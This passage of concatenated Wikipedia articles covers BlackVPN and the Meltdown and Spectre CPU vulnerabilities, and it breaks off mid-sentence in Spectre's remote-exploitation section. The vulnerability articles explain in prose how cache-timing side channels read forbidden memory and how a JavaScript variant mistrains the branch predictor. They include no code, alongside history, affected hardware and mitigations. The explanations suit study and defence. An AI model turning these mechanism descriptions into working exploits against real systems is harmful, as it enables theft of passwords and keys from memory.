authenticated encryption schemes NIST hash function competition Notes References External links NIST's official Website on the standardization process Post-quantum cryptography website by djb Cryptography standards Cryptography contests Post-quantum cryptography
56186856
https://en.wikipedia.org/wiki/BlackVPN
BlackVPN
BlackVPN (stylized as blackVPN) is a VPN service offered by the Hong Kong-based company BlackVPN Limited. TorrentFreak has interviewed blackVPN in their annual comparison of VPN providers since 2011. In 2014, blackVPN announced that they would begin to indefinitely donate 10 percent of every VPN Privacy Package purchase directly to the Electronic Frontier Foundation in support of The Day We Fight Back protest. Features BlackVPN features AES-256 encryption and DNS leak protection. The service offers apps or manual configurations for Windows, Mac, iOS, Android, Linux, and routers. The company maintains a strict no-logging policy. Servers As of March 2019, BlackVPN runs 31 remote servers in 20 locations and 18 countries, including Australia, Canada, Japan, United Kingdom and United States. Blackmail incident In April 2016, blackVPN claimed to have received blackmail from the Armada Collective hacker group. According to blackVPN, the group threatened to perform a DDoS attack against their VPN servers on April 25 if the ransom of 10.08 bitcoins was not paid. blackVPN also stated that two other VPN service providers had received the same e-mail on April 18 and that VPN service provider AirVPN had suffered a similar threat and attack on May 30. At that time, it was unclear whether the sender of the e-mails simply imitated the group or indeed was Armada Collective. On April 25, DDoS mitigation provider Cloudflare called out the threats as fake, stating that not a single attack was launched against a threatened organization. Reception In March 2016, the Dutch computer magazine Computer!Totaal (C!T) listed blackVPN as one of the nine best VPN services available. However, C!T noted the service's relatively high price and lack of own client as potential downsides. In July 2017, Engadget author Violet Blue mentioned blackVPN as one of the "names that come up as trusted" in the VPN service industry. See also Comparison of virtual private network services References External links BlackVPN's Official Website Virtual private network services
56208586
https://en.wikipedia.org/wiki/Meltdown%20%28security%20vulnerability%29
Meltdown (security vulnerability)
Meltdown is a hardware vulnerability affecting Intel x86 microprocessors, IBM POWER processors, and some ARM-based microprocessors. It allows a rogue process to read all memory, even when it is not authorized to do so. Meltdown affects a wide range of systems. At the time of disclosure (2018), this included all devices running any but the most recent and patched versions of iOS, Linux, macOS, or Windows. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM-based processors (mobile devices, smart TVs, printers and others), including a wide range of networking equipment. A purely software workaround to Meltdown has been assessed as slowing computers between 5 and 30 percent in certain specialized workloads, although companies responsible for software correction of the exploit are reporting minimal impact from general benchmark testing. Meltdown was issued a Common Vulnerabilities and Exposures ID of , also known as Rogue Data Cache Load (RDCL), in January 2018. It was disclosed in conjunction with another exploit, Spectre, with which it shares some characteristics. The Meltdown and Spectre vulnerabilities are considered "catastrophic" by security analysts. The vulnerabilities are so severe that security researchers initially believed the reports to be false. Several procedures to help protect home computers and related devices from the Meltdown and Spectre security vulnerabilities have been published. Meltdown patches may produce performance loss. Spectre patches have been reported to significantly reduce performance, especially on older computers; on the newer eighth-generation Core platforms, benchmark performance drops of 2–14 percent have been measured. On 18 January 2018, unwanted reboots, even for newer Intel chips, due to Meltdown and Spectre patches, were reported. Nonetheless, according to Dell: "No 'real-world' exploits of these vulnerabilities [i.e., Meltdown and Spectre] have been reported to date [26 January 2018], though researchers have produced proof-of-concepts." Further, recommended preventions include: "promptly adopting software updates, avoiding unrecognized hyperlinks and websites, not downloading files or applications from unknown sources ... following secure password protocols ... [using] security software to help protect against malware (advanced threat prevention software or anti-virus)." On 25 January 2018, the current status and possible future considerations in solving the Meltdown and Spectre vulnerabilities were presented. On 15 March 2018, Intel reported that it will redesign its CPUs to help protect against the Meltdown and related Spectre vulnerabilities (especially, Meltdown and Spectre-V2, but not Spectre-V1), and expects to release the newly redesigned processors later in 2018. On 8 October 2018, Intel is reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors. Overview Meltdown exploits a race condition, inherent in the design of many modern CPUs. This occurs between memory access and privilege checking during instruction processing. Additionally, combined with a cache side-channel attack, this vulnerability allows a process to bypass the normal privilege checks that isolate the exploit process from accessing data belonging to the operating system and other running processes. The vulnerability allows an unauthorized process to read data from any address that is mapped to the current process's memory space. Since instruction pipelining is in the affected processors, the data from an unauthorized address will almost always be temporarily loaded into the CPU's cache during out-of-order execution—from which the data can be recovered. This can occur even if the original read instruction fails due to privilege checking, or if it never produces a readable result. Since many operating systems map physical memory, kernel processes, and other running user space processes into the address space of every process, Meltdown effectively makes it possible for a rogue process to read any physical, kernel or other processes' mapped memory—regardless of whether it should be able to do so. Defenses against Meltdown would require avoiding the use of memory mapping in a manner vulnerable to such exploits (i.e. a software-based solution) or avoidance of the underlying race condition (i.e. a modification to the CPUs' microcode or execution path). The vulnerability is viable on any operating system in which privileged data is mapped into virtual memory for unprivileged processes—which includes many present-day operating systems. Meltdown could potentially impact a wider range of computers than presently identified, as there is little to no variation in the microprocessor families used by these computers. A Meltdown attack cannot be detected if it is carried out. History On 8 May 1995, a paper called "The Intel 80x86 Processor Architecture: Pitfalls for Secure Systems" published at the 1995 IEEE Symposium on Security and Privacy warned against a covert timing channel in the CPU cache and translation lookaside buffer (TLB). This analysis was performed under the auspices of the National Security Agency's Trusted Products Evaluation Program (TPEP). In July 2012, Apple's XNU kernel (used in macOS, iOS and tvOS, among others) adopted kernel address space layout randomization (KASLR) with the release of OS X Mountain Lion 10.8. In essence, the base of the system, including its kernel extensions (kexts) and memory zones, is randomly relocated during the boot process in an effort to reduce the operating system's vulnerability to attacks. In March 2014, the Linux kernel adopted KASLR to mitigate address leaks. On 8 August 2016, Anders Fogh and Daniel Gruss presented "Using Undocumented CPU Behavior to See Into Kernel Mode and Break KASLR in the Process" at the Black Hat 2016 conference. On 10 August 2016, Moritz Lipp et al. of TU Graz published "ARMageddon: Cache Attacks on Mobile Devices" in the proceedings of the 25th USENIX security symposium. Even though focused on ARM, it laid the groundwork for the attack vector. On 27 December 2016, at 33C3, Clémentine Maurice and Moritz Lipp of TU Graz presented their talk "What could possibly go wrong with <insert x86 instruction here>? Side effects include side-channel attacks and bypassing kernel ASLR" which outlined already what is coming. On 1 February 2017, the CVE numbers 2017-5715, 2017-5753 and 2017-5754 were assigned to Intel. On 27 February 2017, Bosman et al. of Vrije Universiteit Amsterdam published their findings how address space layout randomization (ASLR) could be abused on cache-based architectures at the NDSS Symposium. On 27 March 2017, researchers at Austria's Graz University of Technology developed a proof-of-concept that could grab RSA keys from Intel SGX enclaves running on the same system within five minutes by using certain CPU instructions in lieu of a fine-grained timer to exploit cache DRAM side-channels. In June 2017, KASLR was found to have a large class of new vulnerabilities. Research at Graz University of Technology showed how to solve these vulnerabilities by preventing all access to unauthorized pages. A presentation on the resulting KAISER technique was submitted for the Black Hat congress in July 2017, but was rejected by the organizers. Nevertheless, this work led to kernel page-table isolation (KPTI, originally known as KAISER) in 2017, which was confirmed to eliminate a large class of security bugs, including some limited protection against the not-yet-discovered Meltdown – a fact confirmed by the Meltdown authors. In July 2017, research made public on the CyberWTF website by security researcher Anders Fogh outlined the use of a cache timing attack to read kernel space data by observing the results of speculative operations conditioned on data fetched with invalid privileges. Meltdown was discovered independently by Jann Horn from Google's Project Zero, Werner Haas and Thomas Prescher from Cyberus Technology, as well as Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz from Graz University of Technology. The same research teams that discovered Meltdown also discovered Spectre. In October 2017, Kernel ASLR support on amd64 was added to NetBSD-current, making NetBSD the first totally open-source BSD system to support kernel address space layout randomization (KASLR). However, the partially open-source Apple Darwin, which forms the foundation of macOS and iOS (among others), is based on FreeBSD; KASLR was added to its XNU kernel in 2012 as noted above. On 14 November 2017, security researcher Alex Ionescu publicly mentioned changes in the new version of Windows 10 that would cause some speed degradation without explaining the necessity for the changes, just referring to similar changes in Linux. After affected hardware and software vendors had been made aware of the issue on 28 July 2017, the two vulnerabilities were made public jointly, on 3 January 2018, several days ahead of the coordinated release date of 9 January 2018 as news sites started reporting about commits to the Linux kernel and mails to its mailing list. As a result, patches were not available for some platforms, such as Ubuntu, when the vulnerabilities were disclosed. On 28 January 2018, Intel was reported to have shared news of the Meltdown and Spectre security vulnerabilities with Chinese technology companies before notifying the U.S. government of the flaws. The security vulnerability was called Meltdown because "the vulnerability basically melts security boundaries which are normally enforced by the hardware." On 8 October 2018, Intel is reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors. In November 2018, two new variants of the attacks were revealed. Researchers attempted to compromise CPU protection mechanisms using code to exploit weaknesses in memory protection and the instruction. They also attempted but failed to exploit CPU operations for memory alignment, division by zero, supervisor modes, segment limits, invalid opcodes, and non-executable code. Mechanism Meltdown relies on a CPU race condition that can arise between instruction execution and privilege checking. Put briefly, the instruction execution leaves side effects that constitute information not hidden to the process by the privilege check. The process carrying out Meltdown then uses these side effects to infer the values of memory mapped data, bypassing the privilege check. The following provides an overview of the exploit, and the memory mapping that is its target. The attack is described in terms of an Intel processor running Microsoft Windows or Linux, the main test targets used in the original paper, but it also affects other processors and operating systems, including macOS (aka OS X), iOS, and Android. Background – modern CPU design Modern computer processors use a variety of techniques to gain high levels of efficiency. Four widely used features are particularly relevant to Meltdown: Virtual (paged) memory, also known as memory mapping – used to make memory access more efficient and to control which processes can access which areas of memory.A modern computer usually runs many processes in parallel. In an operating system such as Windows or Linux, each process is given the impression that it alone has complete use of the computer's physical memory, and may do with it as it likes. In reality it will be allocated memory to use from the physical memory, which acts as a "pool" of available memory, when it first tries to use any given memory address (by trying to read or write to it). This allows multiple processes, including the kernel or operating system itself, to co-habit on the same system, but retain their individual activity and integrity without being affected by other running processes, and without being vulnerable to interference or unauthorized data leaks caused by a rogue process. Privilege levels, or protection domains – provide a means by which the operating system can control which processes are authorized to read which areas of virtual memory.As virtual memory permits a computer to refer to vastly more memory than it will ever physically contain, the system can be greatly sped up by "mapping" every process and their in-use memory – in effect all memory of all active processes – into every process's virtual memory. In some systems all physical memory is mapped as well, for further speed and efficiency. This is usually considered safe, because the operating system can rely on privilege controls built into the processor itself, to limit which areas of memory any given process is permitted to access. An attempt to access authorized memory will immediately succeed, and an attempt to access unauthorized memory will cause an exception and void the read instruction, which will fail. Either the calling process or the operating system directs what will happen if an attempt is made to read from unauthorized memory – typically it causes an error condition and the process that attempted to execute the read will be terminated. As unauthorized reads are usually not part of normal program execution, it is much faster to use this approach than to pause the process every time it executes some function that requires privileged memory to be accessed, to allow that memory to be mapped into a readable address space. Instruction pipelining and speculative execution – used to allow instructions to execute in the most efficient manner possible – if necessary allowing them to run out of order or in parallel across various processing units within the CPU – so long as the final outcome is correct.Modern processors commonly contain numerous separate execution units, and a scheduler that decodes instructions and decides, at the time they are executed, the most efficient way to execute them. This might involve the decision that two instructions can execute at the same time, or even out of order, on different execution units (known as "instruction pipelining"). So long as the correct outcome is still achieved, this maximizes efficiency by keeping all of the processor's execution units in use as much as possible. Some instructions, such as conditional branches, will lead to one of two different outcomes, depending on a condition. For example, if a value is 0, it will take one action, and otherwise will take a different action. In some cases, the CPU may not yet know which branch to take. This may be because a value is uncached. Rather than wait to learn the correct option, the CPU may proceed immediately (speculative execution). If so, it can either guess the correct option (predictive execution) or even take both (eager execution). If it executes the incorrect option, the CPU will attempt to discard all effects of its incorrect guess. (See also: branch predictor) CPU cache – a modest amount of memory within the CPU used to ensure it can work at high speed, to speed up memory access, and to facilitate "intelligent" execution of instructions in an efficient manner.From the perspective of a CPU, the computer's physical memory is slow to access. Also the instructions a CPU runs are very often repetitive, or access the same or similar memory numerous times. To maximize efficient use of the CPU's resources, modern CPUs often have a modest amount of very fast on-chip memory, known as "CPU cache". When data is accessed or an instruction is read from physical memory, a copy of that information is routinely saved in the CPU cache at the same time. If the CPU later needs the same instruction or memory contents again, it can obtain it with minimal delay from its own cache rather than waiting for a request related to physical memory to take place. Meltdown exploit Ordinarily, the mechanisms described above are considered secure. They provide the basis for most modern operating systems and processors. Meltdown exploits the way these features interact to bypass the CPU's fundamental privilege controls and access privileged and sensitive data from the operating system and other processes. To understand Meltdown, consider the data that is mapped in virtual memory (much of which the process is not supposed to be able to access) and how the CPU responds when a process attempts to access unauthorized memory. The process is running on a vulnerable version of Windows, Linux, or macOS, on a 64-bit processor of a vulnerable type. This is a very common combination across almost all desktop computers, notebooks, laptops, servers and mobile devices. The CPU encounters an instruction accessing the value, A, at an address forbidden to the process by the virtual memory system and the privilege check. Because of speculative execution, the instruction is scheduled and dispatched to an execution unit. This execution unit then schedules both the privilege check and the memory access. The CPU encounters an instruction accessing address Base+A, with Base chosen by the attacker. This instruction is also scheduled and dispatched to an execution unit. The privilege check informs the execution unit that the address of the value, A, involved in the access is forbidden to the process (per the information stored by the virtual memory system), and thus the instruction should fail and subsequent instructions should have no effects. Because these instructions were speculatively executed, however, the data at Base+A may have been cached before the privilege check – and may not have been undone by the execution unit (or any other part of the CPU). If this is indeed the case, the mere act of caching constitutes a leak of information in and of itself. At this point, Meltdown intervenes. The process executes a timing attack by executing instructions referencing memory operands directly. To be effective, the operands of these instructions must be at addresses which cover the possible address, Base+A, of the rejected instruction's operand. Because the data at the address referred to by the rejected instruction, Base+A, was cached nevertheless, an instruction referencing the same address directly will execute faster. The process can detect this timing difference and determine the address, Base+A, that was calculated for the rejected instruction – and thus determine the value A at the forbidden memory address. Meltdown uses this technique in sequence to read every address of interest at high speed, and depending on other running processes, the result may contain passwords, encryption data, and any other sensitive information, from any address of any process that exists in its memory map. In practice, because cache side-channel attacks are slow, it's faster to extract data one bit at a time (only attacks needed to read a byte, rather than if it tried to read all 8 bits at once). Impact The impact of Meltdown depends on the design of the CPU, the design of the operating system (specifically how it uses memory paging), and the ability of a malicious party to get any code run on that system, as well as the value of any data it could read if able to execute. CPU – Many of the most widely used modern CPUs from the late 1990s until early 2018 have the required exploitable design. However, it is possible to mitigate it within CPU design. A CPU that could detect and avoid memory access for unprivileged instructions, or was not susceptible to cache timing attacks or similar probes, or removed cache entries upon non-privilege detection (and did not allow other processes to access them until authorized) as part of abandoning the instruction, would not be able to be exploited in this manner. Some observers consider that all software solutions will be "workarounds" and the only true solution is to update affected CPU designs and remove the underlying weakness. Operating system – Most of the widely used and general-purpose operating systems use privilege levels and virtual memory mapping as part of their design. Meltdown can access only those pages that are memory mapped so the impact will be greatest if all active memory and processes are memory mapped in every process and have the least impact if the operating system is designed so that almost nothing can be reached in this manner. An operating system might also be able to mitigate in software to an extent by ensuring that probe attempts of this kind will not reveal anything useful. Modern operating systems use memory mapping to increase speed so this could lead to performance loss. Virtual machine – A Meltdown attack cannot be used to break out of a virtual machine, i.e., in fully virtualized machines guest user space can still read from guest kernel space, but not from host kernel space. The bug enables reading memory from address space represented by the same page table, meaning the bug does not work between virtual tables. That is, guest-to-host page tables are unaffected, only guest-to-same-guest or host-to-host, and of course host-to-guest since the host can already access the guest pages. This means different VMs on the same fully virtualized hypervisor cannot access each other's data, but different users on the same guest instance can access each other's data. Embedded device – Among the vulnerable chips are those made by ARM and Intel designed for standalone and embedded devices, such as mobile phones, smart TVs, networking equipment, vehicles, hard drives, industrial control, and the like. As with all vulnerabilities, if a third party cannot run code on the device, its internal vulnerabilities remain unexploitable. For example, an ARM processor in a cellphone or Internet of Things "smart" device may be vulnerable, but the same processor used in a device that cannot download and run new code, such as a kitchen appliance or hard drive controller, is believed to not be exploitable. The specific impact depends on the implementation of the address translation mechanism in the OS and the underlying hardware architecture. The attack can reveal the content of any memory that is mapped into a user address space, even if otherwise protected. For example, before kernel page-table isolation was introduced, most versions of Linux mapped all physical memory into the address space of every user-space process; the mapped addresses are (mostly) protected, making them unreadable from user-space and accessible only when transitioned into the kernel. The existence of these mappings makes transitioning to and from the kernel faster, but is unsafe in the presence of the Meltdown vulnerability, as the contents of all physical memory (which may contain sensitive information such as passwords belonging to other processes or the kernel) can then be obtained via the above method by any unprivileged process from user-space. According to researchers, "every Intel processor that implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013)." Intel responded to the reported security vulnerabilities with an official statement. The vulnerability is expected to impact major cloud providers, such as Amazon Web Services (AWS) and Google Cloud Platform. Cloud providers allow users to execute programs on the same physical servers where sensitive data might be stored, and rely on safeguards provided by the CPU to prevent unauthorized access to the privileged memory locations where that data is stored, a feature that the Meltdown exploit circumvents. The original paper reports that paravirtualization (Xen) and containers such as Docker, LXC, and OpenVZ, are affected. They report that the attack on a fully virtualized machine allows the guest user space to read from the guest kernel memory, but not read from the host kernel space. Affected hardware The Meltdown vulnerability primarily affects Intel microprocessors, but the ARM Cortex-A75 and IBM's Power microprocessors are also affected. The vulnerability does not affect AMD microprocessors. When the effect of Meltdown was first made public Intel countered that the flaws affect all processors, but AMD denied this, saying "we believe AMD processors are not susceptible due to our use of privilege level protections within paging architecture". Researchers have indicated that the Meltdown vulnerability is exclusive to Intel processors, while the Spectre vulnerability can possibly affect some Intel, AMD, and ARM processors. However, ARM announced that some of their processors were vulnerable to Meltdown. Google has reported that any Intel processor since 1995 with out-of-order execution is potentially vulnerable to the Meltdown vulnerability (this excludes Itanium and pre-2013 Intel Atom CPUs). Intel introduced speculative execution to their processors with Intel's P6 family microarchitecture with the Pentium Pro IA-32 microprocessor in 1995. ARM has reported that the majority of their processors are not vulnerable, and published a list of the specific processors that are affected. The ARM Cortex-A75 core is affected directly by both Meltdown and Spectre vulnerabilities, and Cortex-R7, Cortex-R8, Cortex-A8, Cortex-A9, Cortex-A15, Cortex-A17, Cortex-A57, Cortex-A72 and Cortex-A73 cores are affected only by the Spectre vulnerability. This contradicts some early statements made about the Meltdown vulnerability as being Intel-only. A large portion of the current mid-range Android handsets use the Cortex-A53 or Cortex-A55 in an octa-core arrangement and are not affected by either the Meltdown or Spectre vulnerability as they do not perform out-of-order execution. This includes devices with the Qualcomm Snapdragon 630, Snapdragon 626, Snapdragon 625, and all Snapdragon 4xx processors based on A53 or A55 cores. Also, no Raspberry Pi computers are vulnerable to either Meltdown or Spectre, except the newly-released Raspberry Pi 4, which uses the ARM Cortex-A72 CPU. IBM has also confirmed that its Power CPUs are affected by both CPU attacks. Red Hat has publicly announced that the exploits are also for IBM System Z, POWER8, and POWER9 systems. Oracle has stated that V9 based SPARC systems (T5, M5, M6, S7, M7, M8, M10, M12 processors) are not affected by Meltdown, though older SPARC processors that are no longer supported may be impacted. Mitigation Mitigation of the vulnerability requires changes to operating system kernel code, including increased isolation of kernel memory from user-mode processes. Linux kernel developers have referred to this measure as kernel page-table isolation (KPTI). KPTI patches have been developed for Linux kernel 4.15, and have been released as a backport in kernels 4.14.11, 4.9.75. Red Hat released kernel updates to their Red Hat Enterprise Linux distributions version 6 and version 7. CentOS also already released their kernel updates to CentOS 6 and CentOS 7. Apple included mitigations in macOS 10.13.2, iOS 11.2, and tvOS 11.2. These were released a month before the vulnerabilities were made public. Apple has stated that watchOS and the Apple Watch are not affected. Additional mitigations were included in a Safari update as well a supplemental update to macOS 10.13, and iOS 11.2.2. Microsoft released an emergency update to Windows 10, 8.1, and 7 SP1 to address the vulnerability on 3 January 2018, as well as Windows Server (including Server 2008 R2, Server 2012 R2, and Server 2016) and Windows Embedded Industry. These patches are incompatible with third-party antivirus software that use unsupported kernel calls; systems running incompatible antivirus software will not receive this or any future Windows security updates until it is patched, and the software adds a special registry key affirming its compatibility. The update was found to have caused issues on systems running certain AMD CPUs, with some users reporting that their Windows installations did not boot at all after installation. On 9 January 2018, Microsoft paused the distribution of the update to systems with affected CPUs while it investigates and addresses this bug. It was reported that implementation of KPTI may lead to a reduction in CPU performance, with some researchers claiming up to 30% loss in performance, depending on usage, though Intel considered this to be an exaggeration. It was reported that Intel processor generations that support process-context identifiers (PCID), a feature introduced with Westmere and available on all chips from the Haswell architecture onward, were not as susceptible to performance losses under KPTI as older generations that lack it. This is because the selective translation lookaside buffer (TLB) flushing enabled by PCID (also called address space number or ASN under the Alpha architecture) enables the shared TLB behavior crucial to the exploit to be isolated across processes, without constantly flushing the entire cache – the primary reason for the cost of mitigation. A statement by Intel said that "any performance impacts are workload-dependent, and, for the average computer user, should not be significant and will be mitigated over time". Phoronix benchmarked several popular PC games on a Linux system with Intel's Coffee Lake Core i7-8700K CPU and KPTI patches installed, and found that any performance impact was little to non-existent. In other tests, including synthetic I/O benchmarks and databases such as PostgreSQL and Redis, an impact in performance was found, accounting even to tens of percents for some workloads. More recently, related testings, involving AMD's FX and Intel's Sandybridge and Ivybridge CPUs, have been reported. Several procedures to help protect home computers and related devices from the Meltdown and Spectre security vulnerabilities have been published. Meltdown patches may produce performance loss. On 18 January 2018, unwanted reboots, even for newer Intel chips, due to Meltdown and Spectre patches, were reported. According to Dell: "No 'real-world' exploits of these vulnerabilities [ie, Meltdown and Spectre] have been reported to date [26 January 2018], though researchers have produced proof-of-concepts." Further, recommended preventions include: "promptly adopting software updates, avoiding unrecognized hyperlinks and websites, not downloading files or applications from unknown sources ... following secure password protocols ... [using] security software to help protect against malware (advanced threat prevention software or anti-virus)." On 25 January 2018, the current status and possible future considerations in solving the Meltdown and Spectre vulnerabilities were presented. In March 2018, Intel announced that it had designed hardware fixes for future processors for Meltdown and Spectre-V2 only, but not Spectre-V1. The vulnerabilities were mitigated by a new partitioning system that improves process and privilege-level separation. The company also announced it had developed Intel Microcode workarounds for processors dating back to 2013, and that it had plans to develop them for most processors dating back to 2007 including the Core 2 Duo; however, a month later in April 2018, it announced it was backing off that plan for a number of processor families and that no processor earlier than 2008 would have a patch available. On 8 October 2018, Intel is reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors. See also Foreshadow (security vulnerability) Intel Management Engine – an Intel subsystem which was discovered to have a major security vulnerability in 2017 Microarchitectural Data Sampling − another set of vulnerabilities, including ZombieLoad, that can leak data in Intel microprocessors Pentium F00F bug Pentium FDIV bug Rogue System Register Read (RSRR) – a related vulnerability also known as Variant 3a Row hammer – an unintended side effect in dynamic random-access memory causing memory cells to interact electrically SPOILER − a Spectre-like, though unrelated, vulnerability affecting only Intel microprocessors, disclosed in 2019. Transient execution CPU vulnerabilities References External links Official website of the Meltdown and Spectre vulnerabilities Google Project Zero write-up CVE-2017-5754 at National Vulnerability Database Meltdown's proof-of-concept released by researchers that also published the meltdown paper. Am I Affected by Meltdown – Meltdown Checker Tool created by Raphael S. Carvalho Meltdown/Spectre Checker Gibson Research Corporation 2018 in computing Computer security exploits Hardware bugs Intel x86 microprocessors Side-channel attacks Speculative execution security vulnerabilities X86 architecture X86 memory management
56209204
https://en.wikipedia.org/wiki/Spectre%20%28security%20vulnerability%29
Spectre (security vulnerability)
Spectre is a class of security vulnerabilities that affects modern microprocessors that perform branch prediction and other forms of speculation. On most processors, the speculative execution resulting from a branch misprediction may leave observable side effects that may reveal private data to attackers. For example, if the pattern of memory accesses performed by such speculative execution depends on private data, the resulting state of the data cache constitutes a side channel through which an attacker may be able to extract information about the private data using a timing attack. Two Common Vulnerabilities and Exposures IDs related to Spectre, (bounds check bypass, Spectre-V1, Spectre 1.0) and (branch target injection, Spectre-V2), have been issued. JIT engines used for JavaScript were found to be vulnerable. A website can read data stored in the browser for another website, or the browser's memory itself. In early 2018, Intel reported that it would redesign its CPUs to help protect against the Spectre and related Meltdown vulnerabilities (especially, Spectre variant 2 and Meltdown, but not Spectre variant 1). On 8 October 2018, Intel is reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors. History In 2002 and 2003, Yukiyasu Tsunoo and colleagues from NEC showed how to attack MISTY and DES symmetric key ciphers, respectively. In 2005, Daniel Bernstein from the University of Illinois, Chicago reported an extraction of an OpenSSL AES key via a cache timing attack, and Colin Percival had a working attack on the OpenSSL RSA key using the Intel processor's cache. In 2013 Yuval Yarom and Katrina Falkner from the University of Adelaide showed how measuring the access time to data lets a nefarious application determine if the information was read from the cache or not. If it was read from the cache the access time would be very short, meaning the data read could contain the private key of encryption algorithms. This technique was used to successfully attack GnuPG, AES and other cryptographic implementations. In January 2017, Anders Fogh gave a presentation at the Ruhruniversität Bochum about automatically finding covert channels, especially on processors with a pipeline used by more than one processor core. Spectre proper was discovered independently by Jann Horn from Google's Project Zero and Paul Kocher in collaboration with Daniel Genkin, Mike Hamburg, Moritz Lipp and Yuval Yarom. Microsoft Vulnerability Research extended it to browsers' JavaScript JIT engines. It was made public in conjunction with another vulnerability, Meltdown, on 3 January 2018, after the affected hardware vendors had already been made aware of the issue on 1 June 2017. The vulnerability was called Spectre because it was "based on the root cause, speculative execution. As it is not easy to fix, it will haunt us for quite some time." On 28 January 2018, it was reported that Intel shared news of the Meltdown and Spectre security vulnerabilities with Chinese technology companies, before notifying the U.S. government of the flaws. On 29 January 2018, Microsoft was reported to have released a Windows update that disabled the problematic Intel Microcode fix—which had, in some cases, caused reboots, system instability, and data loss or corruption—issued earlier by Intel for the Spectre Variant 2 attack. Woody Leonhard of ComputerWorld expressed a concern about installing the new Microsoft patch. Since the disclosure of Spectre and Meltdown in January 2018, a lot of research on vulnerabilities related to speculative execution had been done. On 3 May 2018, eight additional Spectre-class flaws provisionally named Spectre-NG by c't (German computer magazine) were reported affecting Intel and possibly AMD and ARM processors. Intel reported that they were preparing new patches to mitigate these flaws. Affected are all Core-i processors and Xeon derivates since Nehalem (2010) and Atom-based processors since 2013. Intel postponed their release of microcode updates to 10 July 2018. On 21 May 2018, Intel published information on the first two Spectre-NG class side-channel vulnerabilities (Rogue System Register Read, Variant 3a) and (Speculative Store Bypass, Variant 4), also referred to as Intel SA-00115 and HP PSR-2018-0074, respectively. According to Amazon Deutschland, Cyberus Technology, SYSGO, and Colin Percival (FreeBSD), Intel has revealed details on the third Spectre-NG variant (Lazy FP State Restore, Intel SA-00145) on 13 June 2018. It is also known as Lazy FPU state leak (abbreviated "LazyFP") and "Spectre-NG 3". On 10 July 2018, Intel revealed details on another Spectre-NG class vulnerability called "Bounds Check Bypass Store" (BCBS), aka "Spectre 1.1" (), which was able to write as well as read out of bounds. Another variant named "Spectre 1.2" was mentioned as well. In late July 2018, researchers at the universities of Saarland and California revealed ret2spec (aka "Spectre v5") and SpectreRSB, new types of code execution vulnerabilities using the Return Stack Buffer (RSB). At the end of July 2018, researchers at the University of Graz revealed "NetSpectre", a new type of remote attack similar to Spectre V1, but which does not need attacker-controlled code to be run on the target device at all. On 8 October 2018, Intel is reported to have added hardware and firmware mitigations regarding Spectre and Meltdown vulnerabilities to its latest processors. In November 2018, five new variants of the attacks were revealed. Researchers attempted to compromise CPU protection mechanisms using code to exploit the CPU pattern history table, branch target buffer, return stack buffer, and branch history table. In August 2019, a related transient execution CPU vulnerability, Spectre SWAPGS (), was reported. In late April 2021, a related vulnerability was discovered that breaks through the security systems designed to mitigate Spectre through use of the micro-op cache. The vulnerability is known to affect Skylake and later processors from Intel and Zen-based processors from AMD. Mechanism Spectre is a vulnerability that tricks a program into accessing arbitrary locations in the program's memory space. An attacker may read the content of accessed memory, and thus potentially obtain sensitive data. Instead of a single easy-to-fix vulnerability, the Spectre white paper describes a whole class of potential vulnerabilities. They are all based on exploiting side effects of speculative execution, a common means of hiding memory latency and so speeding up execution in modern microprocessors. In particular, Spectre centers on branch prediction, which is a special case of speculative execution. Unlike the related Meltdown vulnerability disclosed at the same time, Spectre does not rely on a specific feature of a single processor's memory management and protection system, but is instead a more generalized idea. The starting point of the white paper is that of a side-channel timing attack applied to the branch prediction machinery of modern out-of-order executing microprocessors. While at the architectural level documented in processor data books, any results of misprediction are specified to be discarded after the fact, the resulting speculative execution may still leave side effects, like loaded cache lines. These can then affect the so-called non-functional aspects of the computing environment later on. If such side effects including but not limited to memory access timing are visible to a malicious program, and can be engineered to depend on sensitive data held by the victim process, then these side effects can result in such data becoming discernible. This can happen despite the formal architecture-level security arrangements working as designed; in this case, lower, microarchitecture-level optimizations to code execution can leak information not essential to the correctness of normal program execution. The Spectre paper displays the attack in four essential steps: First, it shows that branch prediction logic in modern processors can be trained to reliably hit or miss based on the internal workings of a malicious program. It then goes on to show that the subsequent difference between cache hits and misses can be reliably timed, so that what should have been a simple non-functional difference can in fact be subverted into a covert channel which extracts information from an unrelated process's inner workings. Thirdly, the paper synthesizes the results with return-oriented programming exploits and other principles with a simple example program and a JavaScript snippet run under a sandboxing browser; in both cases, the entire address space of the victim process (i.e. the contents of a running program) is shown to be readable by simply exploiting speculative execution of conditional branches in code generated by a stock compiler or the JavaScript machinery present in an existing browser. The basic idea is to search existing code for places where speculation touches upon otherwise inaccessible data, manipulate the processor into a state where speculative execution has to contact that data, and then time the side effect of the processor being faster, if its by-now-prepared prefetch machinery indeed did load a cache line. Finally, the paper concludes by generalizing the attack to any non-functional state of the victim process. It briefly discusses even such highly non-obvious non-functional effects as bus arbitration latency. Meltdown can be used to read privileged memory in a process's address space which even the process itself would normally be unable to access (on some unprotected OSes this includes data belonging to the kernel or other processes). It was shown, that under certain circumstances, the Spectre vulnerability is also capable of reading memory outside of the current processes memory space. The Meltdown paper distinguishes the two vulnerabilities thus: "Meltdown is distinct from the Spectre Attacks in several ways, notably that Spectre requires tailoring to the victim process's software environment, but applies more broadly to CPUs and is not mitigated by KAISER." Remote exploitation While Spectre is simpler to exploit with a compiled language such as C or C++ by locally executing machine code, it can also be remotely exploited by code hosted on remote malicious web pages, for example interpreted languages like JavaScript, which run locally using a web browser. The scripted malware would then have access to all the memory mapped to the address space of the running browser. The exploit using remote JavaScript follows a similar flow to that of a local machine code exploit: Flush Cache → Mistrain Branch Predictor → Timed Reads (tracking hit / miss). The absence of the availability to use the clflush instruction (cache-line flush) in JavaScript requires an alternate approach. There are several automatic cache eviction policies which the CPU may choose, and the attack relies on being able to force that eviction for the exploit to work. It was found that using a second index on the large array, which was kept several iterations behind the first index, would cause the least recently used (LRU) policy to be used. This allows the exploit to effectively clear the cache just by doing incremental reads on a large dataset. The branch predictor would then be mistrained by iterating over a very large dataset using bitwise operations for setting the index to in-range values, and then using an out-of-bounds address for the final iteration. A high-precision timer would then be required in order to determine if a set of reads led to a 